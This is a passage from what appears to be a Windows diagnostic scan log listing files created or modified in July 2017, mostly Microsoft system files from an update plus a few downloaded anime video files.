2017-07-12 09:28 - 2017-07-07 03:05 - 011870720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-07-12 09:28 - 2017-07-07 03:04 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
2017-07-12 09:28 - 2017-07-07 03:02 - 000508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2017-07-12 09:28 - 2017-07-07 03:01 - 006287360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-07-12 09:28 - 2017-07-07 02:59 - 003656704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-07-12 09:28 - 2017-07-01 19:52 - 000031932 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-07-12 09:28 - 2017-06-20 03:17 - 000034720 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2017-07-12 09:28 - 2017-06-20 03:16 - 000335776 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2017-07-12 09:28 - 2017-06-20 03:15 - 000233376 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2017-07-12 09:28 - 2017-06-20 03:11 - 001395152 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2017-07-12 09:28 - 2017-06-20 03:11 - 000411992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll
2017-07-12 09:28 - 2017-06-20 03:10 - 002327456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-07-12 09:28 - 2017-06-20 03:10 - 001930320 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2017-07-12 09:28 - 2017-06-20 03:08 - 001242528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2017-07-12 09:28 - 2017-06-20 03:05 - 001057832 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2017-07-12 09:28 - 2017-06-20 03:04 - 004847424 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-07-12 09:28 - 2017-06-20 03:03 - 000820128 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-07-12 09:28 - 2017-06-20 03:03 - 000102312 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredentialUIBroker.exe
2017-07-12 09:28 - 2017-06-20 03:00 - 000142752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-07-12 09:28 - 2017-06-20 02:59 - 006554928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-07-12 09:28 - 2017-06-20 02:59 - 001220072 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2017-07-12 09:28 - 2017-06-20 02:59 - 000467504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2017-07-12 09:28 - 2017-06-20 02:58 - 000833160 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll
2017-07-12 09:28 - 2017-06-20 02:57 - 002681760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-07-12 09:28 - 2017-06-20 02:57 - 000204192 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll
2017-07-12 09:28 - 2017-06-20 02:15 - 001620368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2017-07-12 09:28 - 2017-06-20 02:14 - 001150784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2017-07-12 09:28 - 2017-06-20 02:13 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModelOOBE.exe
2017-07-12 09:28 - 2017-06-20 02:12 - 000293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-07-12 09:28 - 2017-06-20 02:12 - 000115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2017-07-12 09:28 - 2017-06-20 02:11 - 000200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScDeviceEnum.dll
2017-07-12 09:28 - 2017-06-20 02:11 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-07-12 09:28 - 2017-06-20 02:10 - 000722432 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2017-07-12 09:28 - 2017-06-20 02:10 - 000315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-07-12 09:28 - 2017-06-20 02:10 - 000188928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincredui.dll
2017-07-12 09:28 - 2017-06-20 02:10 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-07-12 09:28 - 2017-06-20 02:09 - 000551424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Payments.dll
2017-07-12 09:28 - 2017-06-20 02:09 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Narrator.exe
2017-07-12 09:28 - 2017-06-20 02:09 - 000250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\SCardSvr.dll
2017-07-12 09:28 - 2017-06-20 02:09 - 000208384 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2017-07-12 09:28 - 2017-06-20 02:09 - 000189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll
2017-07-12 09:28 - 2017-06-20 02:09 - 000140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-07-12 09:28 - 2017-06-20 02:08 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-07-12 09:28 - 2017-06-20 02:08 - 000386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-07-12 09:28 - 2017-06-20 02:08 - 000328704 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2017-07-12 09:28 - 2017-06-20 02:08 - 000327168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll
2017-07-12 09:28 - 2017-06-20 02:08 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-07-12 09:28 - 2017-06-20 02:08 - 000251392 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll
2017-07-12 09:28 - 2017-06-20 02:07 - 000823296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApi.dll
2017-07-12 09:28 - 2017-06-20 02:07 - 000632832 _____ (Microsoft Corporation) C:\WINDOWS\system32\tileobjserver.dll
2017-07-12 09:28 - 2017-06-20 02:07 - 000626176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2017-07-12 09:28 - 2017-06-20 02:07 - 000510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-07-12 09:28 - 2017-06-20 02:06 - 000942592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2017-07-12 09:28 - 2017-06-20 02:06 - 000847872 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2017-07-12 09:28 - 2017-06-20 02:06 - 000751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-07-12 09:28 - 2017-06-20 02:06 - 000411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2017-07-12 09:28 - 2017-06-20 02:06 - 000299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2017-07-12 09:28 - 2017-06-20 02:05 - 000687616 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-07-12 09:28 - 2017-06-20 02:05 - 000585216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2017-07-12 09:28 - 2017-06-20 02:05 - 000417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-07-12 09:28 - 2017-06-20 02:05 - 000374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-07-12 09:28 - 2017-06-20 02:04 - 001818624 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2017-07-12 09:28 - 2017-06-20 02:04 - 001425920 _____ (Microsoft Corporation) C:\WINDOWS\system32\certutil.exe
2017-07-12 09:28 - 2017-06-20 02:04 - 001177600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2017-07-12 09:28 - 2017-06-20 02:04 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll
2017-07-12 09:28 - 2017-06-20 02:04 - 000400896 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2017-07-12 09:28 - 2017-06-20 02:04 - 000178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeHelper.dll
2017-07-12 09:28 - 2017-06-20 02:03 - 002077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-07-12 09:28 - 2017-06-20 02:01 - 004536320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-07-12 09:28 - 2017-06-20 02:01 - 004396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-07-12 09:28 - 2017-06-20 02:01 - 003803136 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2017-07-12 09:28 - 2017-06-20 02:00 - 002171392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2017-07-12 09:28 - 2017-06-20 01:59 - 002938880 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2017-07-12 09:28 - 2017-06-20 01:59 - 001674240 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2017-07-12 09:28 - 2017-06-20 01:56 - 000985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-07-12 09:28 - 2017-06-20 01:54 - 000059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\DmApiSetExtImplDesktop.dll
2017-07-12 09:28 - 2017-06-20 01:45 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2017-07-12 09:28 - 2017-06-20 01:43 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-07-12 09:28 - 2017-06-20 01:43 - 000124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-07-12 09:28 - 2017-06-20 01:43 - 000080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-07-12 09:28 - 2017-06-20 01:42 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-07-12 09:28 - 2017-06-20 01:42 - 000266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-07-12 09:28 - 2017-06-20 01:38 - 000663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-07-12 09:28 - 2017-06-20 01:37 - 002008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-07-12 09:27 - 2017-07-07 04:27 - 001147288 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-07-12 09:27 - 2017-07-07 04:27 - 001024928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-07-12 09:27 - 2017-07-07 04:27 - 000965024 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2017-07-12 09:27 - 2017-07-07 04:27 - 000821664 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe
2017-07-12 09:27 - 2017-07-07 04:27 - 000750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-07-12 09:27 - 2017-07-07 04:22 - 000119384 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcmnutils.dll
2017-07-12 09:27 - 2017-07-07 04:17 - 001017760 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2017-07-12 09:27 - 2017-07-07 04:15 - 002444696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-07-12 09:27 - 2017-07-07 04:14 - 005477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-07-12 09:27 - 2017-07-07 04:14 - 001171032 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcomp.dll
2017-07-12 09:27 - 2017-07-07 04:13 - 000872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-07-12 09:27 - 2017-07-07 04:13 - 000147800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Clipc.dll
2017-07-12 09:27 - 2017-07-07 04:12 - 000228256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2017-07-12 09:27 - 2017-07-07 04:11 - 007904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-07-12 09:27 - 2017-07-07 04:10 - 021353208 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-07-12 09:27 - 2017-07-07 04:10 - 001337848 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2017-07-12 09:27 - 2017-07-07 04:10 - 000372128 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-07-12 09:27 - 2017-07-07 03:27 - 003670016 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-07-12 09:27 - 2017-07-07 03:27 - 001640448 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2017-07-12 09:27 - 2017-07-07 03:27 - 001050624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-07-12 09:27 - 2017-07-07 03:27 - 000859136 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2017-07-12 09:27 - 2017-07-07 03:27 - 000577024 _____ (Microsoft Corporation) C:\WINDOWS\system32\duser.dll
2017-07-12 09:27 - 2017-07-07 03:27 - 000443392 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationExtensions.dll
2017-07-12 09:27 - 2017-07-07 03:25 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-07-12 09:27 - 2017-07-07 03:24 - 000114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\officecsp.dll
2017-07-12 09:27 - 2017-07-07 03:23 - 000113152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2017-07-12 09:27 - 2017-07-07 03:23 - 000029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapprovp.dll
2017-07-12 09:27 - 2017-07-07 03:22 - 007931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-07-12 09:27 - 2017-07-07 03:22 - 000520704 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-07-12 09:27 - 2017-07-07 03:21 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncCsp.dll
2017-07-12 09:27 - 2017-07-07 03:21 - 000064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-07-12 09:27 - 2017-07-07 03:19 - 000527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-07-12 09:27 - 2017-07-07 03:19 - 000256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-07-12 09:27 - 2017-07-07 03:19 - 000137216 _____ (Microsoft Corporation) C:\WINDOWS\system32\raschap.dll
2017-07-12 09:27 - 2017-07-07 03:18 - 000563712 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairing.dll
2017-07-12 09:27 - 2017-07-07 03:17 - 001878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-07-12 09:27 - 2017-07-07 03:17 - 001260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-07-12 09:27 - 2017-07-07 03:17 - 000536064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2017-07-12 09:27 - 2017-07-07 03:17 - 000229888 _____ (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe
2017-07-12 09:27 - 2017-07-07 03:16 - 000925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-07-12 09:27 - 2017-07-07 03:14 - 001802240 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-07-12 09:27 - 2017-07-07 03:14 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll
2017-07-12 09:27 - 2017-07-07 03:13 - 000840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-07-12 09:27 - 2017-07-07 03:12 - 003307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-07-12 09:27 - 2017-07-07 03:12 - 002055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-07-12 09:27 - 2017-07-07 03:12 - 001713664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2017-07-12 09:27 - 2017-07-07 03:12 - 001420800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll
2017-07-12 09:27 - 2017-07-07 03:12 - 001305088 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-07-12 09:27 - 2017-07-07 03:12 - 001293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-07-12 09:27 - 2017-07-07 03:11 - 003139584 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2017-07-12 09:27 - 2017-07-07 03:11 - 002649600 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-07-12 09:27 - 2017-07-07 03:11 - 002177024 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpcServices.dll
2017-07-12 09:27 - 2017-07-07 03:11 - 000986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-07-12 09:27 - 2017-07-07 03:11 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-07-12 09:27 - 2017-07-07 03:10 - 004707840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-07-12 09:27 - 2017-07-07 03:10 - 002444288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-07-12 09:27 - 2017-07-07 03:07 - 000430080 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll
2017-07-12 09:27 - 2017-07-07 03:07 - 000391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPhoto.dll
2017-07-12 09:27 - 2017-07-07 03:05 - 000370176 _____ (Microsoft Corporation) C:\WINDOWS\system32\msinfo32.exe
2017-07-12 09:27 - 2017-07-07 03:04 - 001703424 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2017-07-12 09:27 - 2017-07-07 03:04 - 001403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdc.dll
2017-07-12 09:27 - 2017-06-20 03:18 - 001564576 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2017-07-12 09:27 - 2017-06-20 03:18 - 000096672 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2017-07-12 09:27 - 2017-06-20 03:17 - 000629152 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2017-07-12 09:27 - 2017-06-20 03:17 - 000544160 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2017-07-12 09:27 - 2017-06-20 03:17 - 000334240 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2017-07-12 09:27 - 2017-06-20 03:17 - 000136096 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2017-07-12 09:27 - 2017-06-20 03:16 - 001214880 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2017-07-12 09:27 - 2017-06-20 03:04 - 000472728 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2017-07-12 09:27 - 2017-06-20 03:03 - 000179608 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll
2017-07-12 09:27 - 2017-06-20 03:02 - 002645688 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-07-12 09:27 - 2017-06-20 03:02 - 000426912 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2017-07-12 09:27 - 2017-06-20 03:00 - 000558920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll
2017-07-12 09:27 - 2017-06-20 03:00 - 000255904 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2017-07-12 09:27 - 2017-06-20 02:59 - 001054280 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2017-07-12 09:27 - 2017-06-20 02:59 - 000583304 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2017-07-12 09:27 - 2017-06-20 02:58 - 000406072 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll
2017-07-12 09:27 - 2017-06-20 02:58 - 000203168 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll
2017-07-12 09:27 - 2017-06-20 02:16 - 000970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctfuimanager.dll
2017-07-12 09:27 - 2017-06-20 02:16 - 000417280 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll
2017-07-12 09:27 - 2017-06-20 02:14 - 000032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mskssrv.sys
2017-07-12 09:27 - 2017-06-20 02:13 - 000216064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll
2017-07-12 09:27 - 2017-06-20 02:13 - 000081408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll
2017-07-12 09:27 - 2017-06-20 02:13 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgr.dll
2017-07-12 09:27 - 2017-06-20 02:12 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyMATEnc.dll
2017-07-12 09:27 - 2017-06-20 02:12 - 000144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Profile.RetailInfo.dll
2017-07-12 09:27 - 2017-06-20 02:10 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyHrtfEnc.dll
2017-07-12 09:27 - 2017-06-20 02:10 - 000189440 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothApis.dll
2017-07-12 09:27 - 2017-06-20 02:09 - 000555008 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgrSvc.dll
2017-07-12 09:27 - 2017-06-20 02:09 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.BlueLightReduction.dll
2017-07-12 09:27 - 2017-06-20 02:09 - 000427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2017-07-12 09:27 - 2017-06-20 02:09 - 000205312 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll
2017-07-12 09:27 - 2017-06-20 02:09 - 000135680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sendmail.dll
2017-07-12 09:27 - 2017-06-20 02:09 - 000062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\dataclen.dll
2017-07-12 09:27 - 2017-06-20 02:08 - 000791040 _____ (Microsoft Corporation) C:\WINDOWS\system32\certca.dll
2017-07-12 09:27 - 2017-06-20 02:08 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Notifications.dll
2017-07-12 09:27 - 2017-06-20 02:07 - 000982016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2017-07-12 09:27 - 2017-06-20 02:07 - 000916992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2017-07-12 09:27 - 2017-06-20 02:07 - 000757248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2017-07-12 09:27 - 2017-06-20 02:07 - 000621056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll
2017-07-12 09:27 - 2017-06-20 02:07 - 000411136 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-07-12 09:27 - 2017-06-20 02:06 - 000455680 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2017-07-12 09:27 - 2017-06-20 02:06 - 000335872 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinDataModelServer.dll
2017-07-12 09:27 - 2017-06-20 02:06 - 000253440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edputil.dll
2017-07-12 09:27 - 2017-06-20 02:06 - 000045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerUI.dll
2017-07-12 09:27 - 2017-06-20 02:05 - 004447744 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-07-12 09:27 - 2017-06-20 02:05 - 002873344 _____ (Microsoft Corporation) C:\WINDOWS\system32\themeui.dll
2017-07-12 09:27 - 2017-06-20 02:05 - 001468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-07-12 09:27 - 2017-06-20 02:05 - 000873472 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2017-07-12 09:27 - 2017-06-20 02:05 - 000696320 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2017-07-12 09:27 - 2017-06-20 02:05 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-07-12 09:27 - 2017-06-20 02:05 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-07-12 09:27 - 2017-06-20 02:04 - 000802816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2017-07-12 09:27 - 2017-06-20 02:03 - 001396224 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2017-07-12 09:27 - 2017-06-20 02:02 - 003204096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.dll
2017-07-12 09:27 - 2017-06-20 02:02 - 002804736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-07-12 09:27 - 2017-06-20 02:02 - 001886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-07-12 09:27 - 2017-06-20 02:02 - 000681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-07-12 09:27 - 2017-06-20 02:02 - 000081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinAUG.dll
2017-07-12 09:27 - 2017-06-20 02:01 - 003332096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2017-07-12 09:27 - 2017-06-20 02:01 - 003059200 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2017-07-12 09:27 - 2017-06-20 02:01 - 001076736 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2017-07-12 09:27 - 2017-06-20 02:01 - 000809984 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2017-07-12 09:27 - 2017-06-20 02:01 - 000397312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2017-07-12 09:27 - 2017-06-20 02:00 - 003057664 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2017-07-12 09:27 - 2017-06-20 01:59 - 001357824 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-07-12 09:27 - 2017-06-20 01:58 - 000625152 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-07-12 09:27 - 2017-06-20 01:57 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2017-07-12 09:27 - 2017-06-20 01:57 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMPushRouterCore.dll
2017-07-12 09:27 - 2017-06-20 01:56 - 000600064 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2017-07-12 09:27 - 2017-06-20 01:56 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdmaud.drv
2017-07-10 22:05 - 2017-07-10 22:05 - 003820607 _____ C:\Users\Hercílio\Downloads\1499653859333.webm
2017-07-10 12:24 - 2017-07-10 12:26 - 065127448 _____ C:\Users\Hercílio\Downloads\PUNCH_Quanzhi_Fashi_-_01_MQ.mp4
2017-07-09 23:20 - 2017-07-09 23:23 - 064286427 _____ C:\Users\Hercílio\Downloads\PUNCH_Made_in_Abyss_-_01_MQ.mp4
2017-07-09 18:32 - 2017-07-09 18:39 - 095244290 _____ C:\Users\Hercílio\Downloads\PUNCH_Boku_no_Hero_Academia_2_-_14v2_MQ.mp4
